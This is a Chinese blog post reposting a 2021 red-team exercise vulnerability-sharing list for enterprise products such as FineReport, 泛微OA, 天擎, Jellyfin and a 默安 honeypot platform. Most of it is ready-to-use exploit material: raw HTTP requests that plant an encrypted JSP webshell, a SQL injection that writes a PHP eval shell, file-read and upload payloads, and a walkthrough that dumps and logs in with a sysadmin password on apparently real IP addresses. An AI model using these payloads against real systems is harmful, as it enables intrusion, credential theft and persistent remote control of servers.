2021.4.8 HW行动 情报共享

  • A+
所属分类:安全新闻

2021.4.8 情报共享 第一批

exchange、致远、天眼、shiro 存在0day
金蝶K3Cloud命令执行 全版本 前台 默认配置
和信创天云桌面系统命令执行,文件上传 全版本 前台 默认配置
用友U8Cloud命令执行
h3c计算管理平台任意账户添加 2016年版
红帆OA任意文件写入漏洞
启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞(CVE已有)
帆软系统疑似存在0day,被RCE。

2021.4.8 HW行动 情报共享

帆软 V9getshell FineReport V9

注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat 启动帆软后默认存在的 JSP 文件: 比如:/tomcat-7.0.96/webapps/ROOT/index.jsp 覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:

POST  /WebReport/ReportServer?  op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update  .jsp  HTTP/1.1Host:  192.168.169.138:8080User-Agent:  Mozilla/5.0  (Windows  NT  10.0;  Win64;  x64)  AppleWebKit/537.36  (KHTML,  like  Gecko)  Chrome/81.0.4044.92  Safari/537.36Connection:  closeAccept-Au:  0c42b2f264071be0507acea1876c74Content-Type:  text/xml;charset=UTF-8Content-Length:  675 {"__CONTENT__":"<%@page  import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class  U  extends  ClassLoader{U(ClassLoader  c){super(c);}public  Class  g(byte  []b){return  super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null)  {String  k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher  c=Cipher.getInstance("AES");c.init(2,new  SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new  U(this.getClass().getClassLoader()).g(c.doFinal(new  sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta  nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}

2021.4.8 HW行动 情报共享

 

和信创天云桌面命令执行

POST /Upload/upload_file.php?l=1 HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Referer: x.x.x.xAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,fil;q=0.8Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGvContent-Length: 164
------WebKitFormBoundaryfcKRltGvContent-Disposition: form-data; name="file"; filename="1.png"Content-Type: image/avif
1------WebKitFormBoundaryfcKRltGv--

 

天擎 

越权访问:GET /api/dbstat/gettablessize HTTP/1.1

 

Jellyfin任意文件读取
GET /Audio/anything/hls/..datajellyfin.db/stream.mp3/ HTTP/1.1
GET /Videos/anything/hls/m/..datajellyfin.db HTTP/1.1
GET /Videos/anything/hls/..datajellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09bf3d8f7 HTTP/1.1

 

天擎-前台sql注入

注入写shell:
https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:Program Files (x86)360skylar6www1.php';drop table O;--

利用过程:
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell
2. 通过注入点,创建一张表 O
3. 为 表O 添加一个新字段 T 并且写入shell内容
4. Postgres数据库 使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)
5. 删除 表O

 

泛微OA9 前台无限制Getshell

漏洞位于:/page/exportImport/uploadOperation.jsp文件中

 

Jsp流程大概是:判断请求是否是multipart请求,然就没有了,直接上传了,啊哈哈哈哈哈

重点关注File file=new File(savepath+filename),

Filename参数,是前台可控的,并且没有做任何过滤限制

 

 

2021.4.8 HW行动 情报共享

利用非常简单,只要对着

127.0.0.1/page/exportImport/uploadOperation.jsp

来一个multipartRequest就可以,利用简单,自评高危!!

 

 

2021.4.8 HW行动 情报共享

然后请求路径:

view-source:http://112.91.144.90:5006/page/exportImport/fileTransfer/1.jsp

2021.4.8 HW行动 情报共享

 

泛微OA8 前台SQL注入

漏洞URL:

http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***注入点

 

在getdata.jsp中,直接将request对象交给

weaver.hrm.common.AjaxManager.getData(HttpServletRequest,ServletContext) :

方法处理

 

 

2021.4.8 HW行动 情报共享

在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法

 

 

2021.4.8 HW行动 情报共享

Proc方法4个参数,(“空字符串”,”cmd参数值”,request对象,serverContext对象)

在proc方法中,对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds(sql,type)方法中

 

 

2021.4.8 HW行动 情报共享

在getSelectAllIds(sql,type)方法中,直接将sql参数的值,传递进数据库执行,并判断type的值是否等于5,如果等于5,获取查询结果的requestId字段,否则获取查询结果的id字段

到此,参数从URL,一直到数据库被执行

 

 

2021.4.8 HW行动 情报共享

根据以上代码流程,只要构造请求参数

?cmd= getSelectAllId&sql=selectpassword as id from userinfo;

即可完成对数据库操控

在浏览器中,构造测试URL:

http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id

页面显示1234

2021.4.8 HW行动 情报共享

 

使用payload:

Select password as id from HrmResourceManager

 

http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

 

查询HrmResourceManager表中的password字段,页面中返回了数据库第一条记录的值(sysadmin用户的password)

 

 

2021.4.8 HW行动 情报共享

 

对密文进行md5对比:

 

 

2021.4.8 HW行动 情报共享

 

使用sysadmin    123450aA.登录系统

2021.4.8 HW行动 情报共享

 

 

默安蜜罐管理平台未授权问

2021.4.8 HW行动 情报共享

 

Fofa 搜索  幻阵可找到部分公开在公网端口

2021.4.8 HW行动 情报共享

 

 

1、进入幻阵安装系统

 

 

2021.4.8 HW行动 情报共享

刷新并抓包

2021.4.8 HW行动 情报共享

 

Drop掉 /huanzhen/have_installed?

2021.4.8 HW行动 情报共享

 

 

Drop掉 /huanzhen/mode?timestamp

2021.4.8 HW行动 情报共享

 

 

Drop 掉 /huanzhen/version_info

2021.4.8 HW行动 情报共享

 

 

进入页面

2021.4.8 HW行动 情报共享

 

 

点击调试工具并放包

2021.4.8 HW行动 情报共享

 

 

可见可执行ping命令

2021.4.8 HW行动 情报共享

2021.4.8 HW行动 情报共享

2021.4.8 HW行动 情报共享

2021.4.8 HW行动 情报共享

 

 

 

 

 

点击一键诊断

2021.4.8 HW行动 情报共享

 

本文始发于微信公众号(安悉CERT):2021.4.8 HVV | 情报共享

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: